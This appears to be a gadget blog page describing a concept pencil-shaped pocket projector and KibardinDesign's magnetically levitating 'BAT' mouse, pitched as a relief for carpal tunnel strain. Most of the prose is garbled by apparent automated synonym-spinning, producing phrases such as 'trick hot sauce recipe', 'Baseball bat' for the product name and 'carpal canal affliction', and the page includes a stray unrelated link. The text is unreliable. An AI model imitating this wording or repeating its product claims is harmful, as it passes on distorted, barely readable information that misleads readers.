Wouldn’t this be nice in case whatever you needed to take to some company speech ended up being a new pen? The latest notion style of your Pattern Web site is by means of Edgar Navarro in fact it is termed the Transportable Pencil Projector. Your Transportable Pencil projector can be as potent seeing that some other projector, yet it’s a great deal more compact in addition to smart. Your projector is encased within a steel pot in addition to includes a lot of well put together functions such as Wireless Bluetooth in addition to an DIRECTED system. To adjust the photograph, the pen provides rings that are touchingly vulnerable and they are accustomed to alter the image resolution in addition to concentration. If you are focused on a new projection endure, next whatever you would have to complete removes the pen limit in addition to endure this available. Maybe when the technological innovation becomes little ample, we’re able to view this system in the future.

Sadly we now have zero precisely value or generate time frame regarding sale made.

So, with this particular Transportable Pencil Projector, providing should bother about hauling around huge projector product to exhibit away from images of this trip in order to provide a job.



The Mouse That Can Float like

The Mouse That Can Float like…






Republic’s capital ‘Prague’ designing studio KibardinDesign has made very unique wireless mouse. The name of this mouse is ‘BAT’.

Its height from the pad is 40 mm but when an user hold the mouse the become 10 mm. The mouse is in testing face and soon it will be launch. Your hand will not pain because of its design.
http://www.ihs-standards.com

Some people are merely far too attached to any scarce illusion whoever authentic lifestyle will never be verified nevertheless like a suspended unfamiliar spaceship popularly mentioned as UFO. I am able to assume that will Vadim Kibardin satisfies the actual stated stereotype because it is newest development is greatly inspired by means of a great not known hurtling thing. Named for the reason that Baseball bat, that computer mouse button floats previously mentioned it is mat whenever eventually left bored.
The trick hot sauce recipe involving the very expensive peripheral is for the magnet process included in both the mat plus the computer mouse button. This specific process prevents the actual computer mouse button coming from laying for the mat surface while also training this stably for the oxygen. The item may possibly not have the same intelligent performance including Self confidence! Smart mouse, but for geeks, nothing at all defeats it is advanced neatness.
In any case, the actual author of the Baseball bat doesn’t pattern that contraption just by flaunt. It truly is used to serve a purpose which often, in this case, is pretty unpredictable According to Kibardin Design, that computer mouse button is supposed to ease the actual numbness caused by carpal canal affliction. It’s an ailment commonly endured by means of serious players as well as laptop or computer consumers as well. The actual induce will be the damaged lack of feeling for the wrist that’s made worse because of the force made by the actual excess weight of this hands plus the difficult surface of the workplace.